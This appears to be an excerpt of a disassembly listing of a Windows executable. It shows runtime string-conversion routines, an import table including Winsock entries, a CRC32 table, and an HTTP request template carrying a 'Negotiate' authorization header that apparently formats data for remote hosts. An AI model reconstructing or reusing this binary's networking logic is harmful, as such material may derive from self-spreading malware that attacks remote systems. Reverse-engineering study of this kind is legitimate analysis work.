jz short loc_422E47
mov eax, [ebp+arg_14]
cmp eax, esi
jz short loc_422E69
cmp eax, edi
jl short loc_422E38
mov eax, edi
loc_422E38: ; CODE XREF: sub_422C78+1BC�j
push eax
push ebx
push [ebp+arg_10]
call sub_418C10
add esp, 0Ch
jmp short loc_422E69
; ---------------------------------------------------------------------------
loc_422E47: ; CODE XREF: sub_422C78+1B1�j
cmp [ebp+arg_14], esi
jnz short loc_422E50
push esi
push esi
jmp short loc_422E56
; ---------------------------------------------------------------------------
loc_422E50: ; CODE XREF: sub_422C78+1D2�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_422E56: ; CODE XREF: sub_422C78+1D6�j
push edi
push ebx
push 1
push [ebp+arg_18]
call ds:dword_424070 ;; MultiByteToWideChar
mov edi, eax
cmp edi, esi
jz short loc_422E6D
loc_422E69: ; CODE XREF: sub_422C78+1B8�j
; sub_422C78+1CD�j
mov eax, edi
jmp short loc_422E6F
; ---------------------------------------------------------------------------
loc_422E6D: ; CODE XREF: sub_422C78+66�j
; sub_422C78+B5�j ...
xor eax, eax
loc_422E6F: ; CODE XREF: sub_422C78+AD�j
; sub_422C78+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422C78 endp
; =============== S U B R O U T I N E =======================================
sub_422E81 proc near ; CODE XREF: sub_422C78+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_422EA0
loc_422E91: ; CODE XREF: sub_422E81+1D�j
cmp word ptr [eax], 0
jz short loc_422EA0
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_422E91
loc_422EA0: ; CODE XREF: sub_422E81+E�j
; sub_422E81+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_422EAE
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_422EAE: ; CODE XREF: sub_422E81+24�j
mov eax, edx
retn
sub_422E81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422EB1 proc near ; CODE XREF: sub_422C03+35�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_422EF1
cmp [ebp+arg_0], 100h
jnb short loc_422ED5
movzx eax, [ebp+arg_0]
mov ecx, ds:off_433C74
mov ax, [ecx+eax*2]
jmp short loc_422EF8
; ---------------------------------------------------------------------------
loc_422ED5: ; CODE XREF: sub_422EB1+12�j
push 0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 1
call sub_422F03
add esp, 18h
test eax, eax
jnz short loc_422EF5
loc_422EF1: ; CODE XREF: sub_422EB1+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_422EF5: ; CODE XREF: sub_422EB1+3E�j
mov eax, [ebp+var_4]
loc_422EF8: ; CODE XREF: sub_422EB1+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_422EB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F03 proc near ; CODE XREF: sub_422EB1+34�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424D60
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4CDCA8
xor edi, edi
cmp eax, edi
jnz short loc_422F72
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4248D8
push esi
call ds:dword_424028 ;; GetStringTypeW
test eax, eax
jz short loc_422F50
mov eax, esi
jmp short loc_422F6D
; ---------------------------------------------------------------------------
loc_422F50: ; CODE XREF: sub_422F03+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_436EF4
push esi
push edi
call ds:dword_42402C ;; GetStringTypeA
test eax, eax
jz loc_4230B4
push 2
pop eax
loc_422F6D: ; CODE XREF: sub_422F03+4B�j
mov ds:dword_4CDCA8, eax
loc_422F72: ; CODE XREF: sub_422F03+2F�j
cmp eax, 1
jnz short loc_422F8E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424028 ;; GetStringTypeW
jmp loc_4230B6
; ---------------------------------------------------------------------------
loc_422F8E: ; CODE XREF: sub_422F03+72�j
cmp eax, 2
jnz loc_4230B4
cmp [ebp+arg_10], edi
jnz short loc_422FA4
mov eax, ds:dword_4CDA58
mov [ebp+arg_10], eax
loc_422FA4: ; CODE XREF: sub_422F03+97�j
push edi
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_424150 ;; WideCharToMultiByte
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz loc_4230B4
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_2C], eax
push esi
push edi
push eax
call sub_417330
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_423002
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_2C], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_423002: ; CODE XREF: sub_422F03+EA�j
cmp [ebp+var_2C], edi
jz loc_4230B4
push edi
push edi
push esi
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
call ds:dword_424150 ;; WideCharToMultiByte
test eax, eax
jz loc_4230B4
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_423057
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_423057: ; CODE XREF: sub_422F03+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_4230B4
mov eax, [ebp+arg_14]
cmp eax, edi
jnz short loc_42306B
mov eax, ds:dword_4CDA48
loc_42306B: ; CODE XREF: sub_422F03+161�j
mov ecx, [ebp+arg_8]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_0]
push eax
call ds:dword_42402C ;; GetStringTypeA
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_4230B4
cmp word ptr [esi], 0FFFFh
jnz short loc_4230B4
push edi
push ebx
push [ebp+arg_C]
call sub_4182C0
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_4230B6
; ---------------------------------------------------------------------------
loc_4230B4: ; CODE XREF: sub_422F03+61�j
; sub_422F03+8E�j ...
xor eax, eax
loc_4230B6: ; CODE XREF: sub_422F03+86�j
; sub_422F03+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422F03 endp
; =============== S U B R O U T I N E =======================================
sub_4230C8 proc near ; DATA XREF: _1:00424F14�o
; FUNCTION CHUNK AT 0040445C SIZE 00000008 BYTES
lea ecx, [ebp-38h]
jmp loc_40445C
sub_4230C8 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_4230E6
mov ecx, [ebp+8]
jmp loc_40445C
; ---------------------------------------------------------------------------
locret_4230E6: ; CODE XREF: _0:004230D8�j
retn
; ---------------------------------------------------------------------------
loc_4230E7: ; DATA XREF: sub_404032�o
mov eax, offset dword_424EE8
jmp loc_417F4B
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+14h]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_4230FC: ; DATA XREF: _1:00424F44�o
lea ecx, [ebp-1Ch]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_423104: ; DATA XREF: sub_4041D4�o
mov eax, offset dword_424F18
jmp loc_417F4B
; ---------------------------------------------------------------------------
align 10h
loc_423110: ; DATA XREF: sub_40473F�o
mov eax, offset dword_424F48
jmp loc_417F4B
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_422BA6
; ---------------------------------------------------------------------------
loc_423122: ; DATA XREF: sub_4227EE�o
mov eax, offset dword_424FA8
jmp loc_417F4B
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_423134: ; DATA XREF: sub_422863�o
mov eax, offset dword_425040
jmp loc_417F4B
; ---------------------------------------------------------------------------
mov ecx, [ebp-14h]
jmp sub_422BA6
; ---------------------------------------------------------------------------
loc_423146: ; DATA XREF: sub_4228C0�o
mov eax, offset dword_425064
jmp loc_417F4B
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_422BA6
; ---------------------------------------------------------------------------
loc_423158: ; DATA XREF: sub_422908�o
mov eax, offset dword_425088
jmp loc_417F4B
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40445C
; ---------------------------------------------------------------------------
loc_42316A: ; DATA XREF: sub_42298A�o
mov eax, offset dword_4250E8
jmp loc_417F4B
_0 ends
; Section 2. (virtual address 00024000)
; Virtual size : 00001C3C ( 7228.)
; Section size in file : 00001C3C ( 7228.)
; Offset to raw data for section: 00024000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_1 segment para public 'CODE' use32
assume cs:_1
;org 424000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
off_424000 dd offset sub_4E051C ; DATA XREF: sub_40AAFA+36�r
dword_424004 dd 77E6BD68h ; DATA XREF: sub_422492+173�r
dword_424008 dd 77E77F2Eh ; DATA XREF: sub_4221EA+3E�r
; sub_4221EA+261�r
dword_42400C dd 77E762D0h ; DATA XREF: sub_4221EA+5B�r
; sub_4221EA+B9�r
dword_424010 dd 77E70192h ; DATA XREF: sub_4211F1+F9�r
dword_424014 dd 77E7176Ch ; DATA XREF: sub_42090A+8�r
dword_424018 dd 77E7339Ch ; DATA XREF: sub_4208D2+C�r
off_42401C dd offset sub_4DEC54 ; DATA XREF: sub_4208B4+5�r
; sub_4208C5+6�r
dword_424020 dd 77E73FF9h ; DATA XREF: sub_41FE6F+2C�r
dword_424024 dd 77E7FF2Eh ; DATA XREF: sub_41FD41:loc_41FD91�r
; sub_41FDB8:loc_41FE0B�r
dword_424028 dd 77E7C866h ; DATA XREF: sub_41FB63+3F�r
; sub_41FB63+12D�r ...
dword_42402C dd 77E641EBh ; DATA XREF: sub_41FB63+59�r
; sub_41FB63+8D�r ...
dword_424030 dd 77E78406h ; DATA XREF: sub_41F5BF+FF�r
; sub_41F5BF+166�r ...
dword_424034 dd 77E79C3Dh ; DATA XREF: sub_41F5BF+158�r
; sub_41F885+143�r
dword_424038 dd 77E7C931h ; DATA XREF: sub_41F5BF+19D�r
dword_42403C dd 77E77EE1h ; DATA XREF: sub_41F48D+9�r
dword_424040 dd 77E67702h ; DATA XREF: sub_41F48D:loc_41F4BC�r
; sub_41F48D+E1�r
dword_424044 dd 77E7C9E1h ; DATA XREF: sub_41F48D+CE�r
dword_424048 dd 77E9C5B1h ; DATA XREF: sub_41F48D+11F�r
dword_42404C dd 77EB9A84h ; DATA XREF: sub_41EFAB+138�r
dword_424050 dd 77E6C703h ; DATA XREF: sub_41EAC6+1A�r
dword_424054 dd 77E73C49h ; DATA XREF: sub_401000+AD�r
; sub_40144A+95�r ...
dword_424058 dd 77E7751Ah ; DATA XREF: sub_401000+27�r
; sub_40144A+1A6�r ...
dword_42405C dd 77E802FCh ; DATA XREF: sub_4010B5+18C�r
; sub_4010B5+2D4�r ...
dword_424060 dd 77E6D75Bh ; DATA XREF: sub_4010B5+182�r
; sub_401A76+FF�r
dword_424064 dd 77E61BE6h ; DATA XREF: sub_4018D0+9A�r
; sub_4023A7+5D�r ...
dword_424068 dd 77E704FCh ; DATA XREF: sub_4022C6+20�r
; sub_40B8D8+183�r ...
dword_42406C dd 77E70F89h ; DATA XREF: sub_4022C6+E�r
; sub_40BF6D+D�r ...
dword_424070 dd 77E77CCEh ; DATA XREF: sub_4029E9+66�r
; sub_402ACC+65�r ...
off_424074 dd offset sub_4E03FC ; DATA XREF: sub_402DD7+135�r
; sub_40494F+1A9�r ...
off_424078 dd offset sub_4E03D5 ; DATA XREF: sub_402DD7+120�r
; sub_402DD7+150�r ...
dword_42407C dd 77E79D8Ch ; DATA XREF: sub_402DD7+103�r
; sub_404861+94�r ...
dword_424080 dd 77E73EACh ; DATA XREF: sub_402DD7+E9�r
off_424084 dd offset sub_4E02B0 ; DATA XREF: sub_402DD7+68�r
; sub_40494F+A7�r ...
dword_424088 dd 77E79D5Bh ; DATA XREF: sub_40494F+4BC�r
; sub_40E6A9+68�r ...
dword_42408C dd 77F5157Dh ; DATA XREF: sub_40494F+4A3�r
; sub_4060D0+289�r ...
dword_424090 dd 77E737DEh ; DATA XREF: sub_40494F+43A�r
off_424094 dd offset sub_4DFA24 ; DATA XREF: sub_405A58+18�r
; sub_407252+58�r ...
dword_424098 dd 77E64106h ; DATA XREF: sub_405F4D+A0�r
; sub_40B8D8+1B6�r
dword_42409C dd 77E64006h ; DATA XREF: sub_405F4D+8C�r
; sub_40B8D8+19F�r
dword_4240A0 dd 77E7AC37h ; DATA XREF: sub_4060D0+254�r
; sub_407252+10E�r ...
off_4240A4 dd offset sub_4DF9EC ; DATA XREF: sub_4060D0+1F5�r
; sub_406A0D+38�r ...
off_4240A8 dd offset sub_4DF7AF ; DATA XREF: sub_4060D0+110�r
; sub_40AC42+10F�r ...
off_4240AC dd offset sub_4DF5FF ; DATA XREF: sub_406387+5EC�r
; sub_408EE5+C0�r ...
dword_4240B0 dd 77E79424h ; DATA XREF: sub_406387+280�r
; sub_409392+135�r
dword_4240B4 dd 77E794BFh ; DATA XREF: sub_406387+272�r
; sub_409392+123�r
off_4240B8 dd offset sub_4DF626 ; DATA XREF: sub_406387+212�r
; sub_406387+5DB�r ...
off_4240BC dd offset sub_4DF334 ; DATA XREF: sub_406387+201�r
; sub_408EE5+26�r
off_4240C0 dd offset sub_4E0460 ; DATA XREF: sub_406A0D+6C�r
; sub_40C512+259�r ...
dword_4240C4 dd 77F7E300h ; DATA XREF: sub_407767+142�r
dword_4240C8 dd 77F7E21Fh ; DATA XREF: sub_407767+D7�r
dword_4240CC dd 77E7C706h ; DATA XREF: sub_40797F+77�r
dword_4240D0 dd 77F53275h ; DATA XREF: sub_40797F+6B�r
; sub_40797F+22F�r
off_4240D4 dd offset sub_4E018D ; DATA XREF: sub_409037+170�r
dword_4240D8 dd 77E78147h ; DATA XREF: sub_409037+BC�r
off_4240DC dd offset sub_4E0076 ; DATA XREF: sub_409037+60�r
; sub_40981F+11�r ...
off_4240E0 dd offset sub_4DFE83 ; DATA XREF: sub_409037+5A�r
; sub_40981F+13A�r ...
dword_4240E4 dd 77F51597h ; DATA XREF: sub_409209+41�r
; sub_409209+F5�r ...
dword_4240E8 dd 77F516F8h ; DATA XREF: sub_409209+21�r
; sub_409392+4A�r ...
dword_4240EC dd 77E77CB7h ; DATA XREF: sub_409209+10�r
; sub_409392+40�r ...
dword_4240F0 dd 77E7F01Ah ; DATA XREF: sub_409392+88�r
; sub_409539+55�r
dword_4240F4 dd 77E61A54h ; DATA XREF: sub_409392+56�r
; sub_409539+97�r
dword_4240F8 dd 77E7C3A5h ; DATA XREF: sub_409392+34�r
; sub_409539+2E�r
dword_4240FC dd 77E706B7h ; DATA XREF: sub_409392+15�r
; sub_409539+13�r ...
off_424100 dd offset sub_4DFF8C ; DATA XREF: sub_40981F+2�r
; sub_40AC42+FB�r ...
dword_424104 dd 77E76A60h ; DATA XREF: sub_40AA35+2D�r
dword_424108 dd 77E71B14h ; DATA XREF: sub_40AABF+26�r
dword_42410C dd 77E7166Fh ; DATA XREF: sub_40AABF+1D�r
off_424110 dd offset sub_4E055B ; DATA XREF: sub_40AAFA+69�r
off_424114 dd offset sub_4E04A4 ; DATA XREF: sub_40AAFA+25�r
dword_424118 dd 77E7011Ah ; DATA XREF: sub_40AB7C+96�r
dword_42411C dd 77E73CE2h ; DATA XREF: sub_40AB7C+60�r
dword_424120 dd 77E61BB8h ; DATA XREF: sub_40AC42+17E�r
; sub_40B56C+F0�r ...
dword_424124 dd 77E668D9h ; DATA XREF: sub_40AC42+15D�r
dword_424128 dd 77E70396h ; DATA XREF: sub_40AC42+126�r
; sub_40E6A9+1B5�r ...
dword_42412C dd 77E6AD34h ; DATA XREF: sub_40AC42+35�r
; sub_40EE72+3E60�r
dword_424130 dd 77E7FF65h ; DATA XREF: sub_40B417+5A�r
dword_424134 dd 77EB7624h ; DATA XREF: sub_40B417+3D�r
dword_424138 dd 77E79CE3h ; DATA XREF: sub_40B56C+91�r
; sub_416810+77�r
dword_42413C dd 77E79C90h ; DATA XREF: sub_40B56C+79�r
; sub_41511F+C�r ...
dword_424140 dd 77E7727Ah ; DATA XREF: sub_40B56C+3B�r
; sub_416717+23�r
dword_424144 dd 77E7C657h ; DATA XREF: sub_40B78A+1D�r
; sub_40B8D8+24�r ...
dword_424148 dd 77E76C1Ah ; DATA XREF: sub_40B8D8+1CF�r
off_42414C dd offset sub_4DF0C8 ; DATA XREF: sub_40CAF1+478�r
; sub_40D3A5+DF�r ...
dword_424150 dd 77E79924h ; DATA XREF: sub_40DBB0+13�r
; sub_41E709+20D�r ...
dword_424154 dd 77E65F4Ch ; DATA XREF: sub_40E5EB+34�r
; _0:00415A6A�r
dword_424158 dd 77E73628h ; DATA XREF: sub_40E6A9+329�r
; sub_40EE72+4AC7�r ...
dword_42415C dd 77E80656h ; DATA XREF: sub_40E6A9+258�r
dword_424160 dd 77E6BD13h ; DATA XREF: sub_40E6A9:loc_40E864�r
dword_424164 dd 77E7C2C4h ; DATA XREF: sub_40E6A9+61�r
dword_424168 dd 77E75CEBh ; DATA XREF: sub_40EE72+4D3A�r
; sub_4165C6+9F�r ...
dword_42416C dd 77E71AFEh ; DATA XREF: sub_40EE72+3C5B�r
dword_424170 dd 77E616B4h ; DATA XREF: sub_41518A+184�r
; sub_415419+1F�r ...
dword_424174 dd 77E76968h ; DATA XREF: sub_41570E+5F�r
dword_424178 dd 77E7513Ch ; DATA XREF: _0:00415B01�r
dword_42417C dd 77E6C29Dh ; DATA XREF: sub_4162AC+1EB�r
dword_424180 dd 77E74C59h ; DATA XREF: sub_4165C6+C7�r
dword_424184 dd 77EC7C51h ; DATA XREF: sub_41699B+5E�r
dword_424188 dd 77F6183Eh ; DATA XREF: sub_422A4C�r
dword_42418C dd 77E76E3Dh ; DATA XREF: sub_4186B1+6C�r
; sub_42094E+38�r
dword_424190 dd 77E61608h ; DATA XREF: sub_4186B1+17�r
dword_424194 dd 77F5722Fh ; DATA XREF: sub_41944F+110�r
; sub_41944F+22D�r ...
dword_424198 dd 77E6177Ah ; DATA XREF: _0:00419C83�r
; sub_41F5BF+59�r
dword_42419C dd 77E7C938h ; DATA XREF: _0:00419C58�r
dword_4241A0 dd 77E7C486h ; DATA XREF: _0:00419C0A�r
dword_4241A4 dd 77E7AC5Eh ; DATA XREF: sub_41AB9C+54�r
dword_4241A8 dd 77E76E0Bh ; DATA XREF: sub_41ACE4+50�r
dword_4241AC dd 77E7C726h ; DATA XREF: sub_41ACE4+11�r
dword_4241B0 dd 77E79E34h ; DATA XREF: sub_41ADB4+240�r
; sub_41B888+120�r ...
dword_4241B4 dd 77E7980Ah ; DATA XREF: sub_41B3E6+76�r
; sub_41B497+51�r ...
dword_4241B8 dd 77E73196h ; DATA XREF: sub_4208EE+C�r
dword_4241BC dd 77E6D706h ; DATA XREF: sub_41C040+215�r
; sub_422BC9+2E�r
dword_4241C0 dd 77F522F2h ; DATA XREF: sub_41D5A8+58�r
dword_4241C4 dd 77E77405h ; DATA XREF: sub_41E709+5E�r
; sub_41E709+A7�r ...
dword_4241C8 dd 77E781F9h ; DATA XREF: sub_41E709+42�r
; sub_41E709+14D�r ...
dword_4241CC dd 77E7849Fh ; DATA XREF: sub_41E92D+48�r
; sub_41EB6C+14�r ...
dword_4241D0 dd 77E7A13Fh ; DATA XREF: sub_41EAC6+2F�r
align 8
dword_4241D8 dd 71B2ACCBh ; DATA XREF: sub_422A40�r
align 10h
dword_4241E0 dd 71AB41DAh ; DATA XREF: sub_4053D5+47�r
; sub_4059DB+15�r
dword_4241E4 dd 71AB3F8Dh ; DATA XREF: sub_4053D5+8D�r
dword_4241E8 dd 71AB3ECEh ; DATA XREF: sub_4053D5+C4�r
dword_4241EC dd 71AB5DE2h ; DATA XREF: sub_4053D5+D8�r
dword_4241F0 dd 71AB868Dh ; DATA XREF: sub_4053D5+180�r
dword_4241F4 dd 71AB8629h ; DATA XREF: _0:004053C1�r
dword_4241F8 dd 71AB2BBFh ; DATA XREF: _0:0040528E�r
dword_4241FC dd 71AB12F8h ; DATA XREF: sub_404E54+27�r
; sub_404F9A+27�r ...
dword_424200 dd 71AB1836h ; DATA XREF: sub_4059DB+6E�r
; sub_405A58+8E�r
dword_424204 dd 71AB5690h ; DATA XREF: sub_404E54+6A�r
; sub_404F9A+6A�r ...
dword_424208 dd 71AB1AF4h ; DATA XREF: sub_403F94+12�r
; sub_404E54+C3�r ...
dword_42420C dd 71AB1890h ; DATA XREF: sub_403DF6+4C�r
; sub_4053D5+115�r
dword_424210 dd 71AB1B7Bh ; DATA XREF: sub_422A46�r
dword_424214 dd 71AB3C22h ; DATA XREF: sub_4018D0+59�r
; _0:0040433C�r ...
dword_424218 dd 71AB155Ah ; DATA XREF: sub_4018D0+70�r
; sub_4053D5+9D�r
dword_42421C dd 71AB3E5Dh ; DATA XREF: sub_4018D0+8C�r
; sub_404E54+59�r ...
dword_424220 dd 71AB1A6Dh ; DATA XREF: sub_4018D0+AA�r
; sub_404E54+E0�r ...
dword_424224 dd 71AB1746h ; DATA XREF: sub_404E54+36�r
; sub_404F9A+36�r ...
align 10h
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_4041D4+62�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dbl_424270 dq 1.388888888888889e-2 ; DATA XREF: sub_403FE6+2F�r
dbl_424278 dq 1.666666666666667e-1 ; DATA XREF: sub_403FE6+15�r
dword_424280 dd 0FFFFFFFFh ; DATA XREF: sub_404032+16F�r
; sub_404464�r ...
align 8
dbl_424288 dq 1.333333333333333 ; DATA XREF: sub_404032+79�r
dword_424290 dd 0 ; DATA XREF: sub_4041D4+4D�o
; sub_404514+5B�o ...
flt_424294 dd 5.0e-1 ; DATA XREF: sub_40494F+398�r
dword_424298 dd 0 ; DATA XREF: sub_40C21E+26�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dbl_424698 dq 9.765625e-4 ; DATA XREF: sub_40CAF1+2BD�r
; sub_40CAF1+2D8�r ...
dbl_4246A0 dq -3.0517578125e-5 ; DATA XREF: sub_415450+1E�r
dbl_4246A8 dq 1.0 ; DATA XREF: sub_417CA4+6C�r
; sub_417DEB+6C�r ...
dword_4246B0 dd 0FFFFFFFFh, 419CBBh, 419CCFh ; DATA XREF: _0:00419BE9�o
byte_4246BC db 6 ; DATA XREF: sub_419E38:loc_419E8F�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: _2:off_433C6C�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: _2:off_433C68�o
align 10h
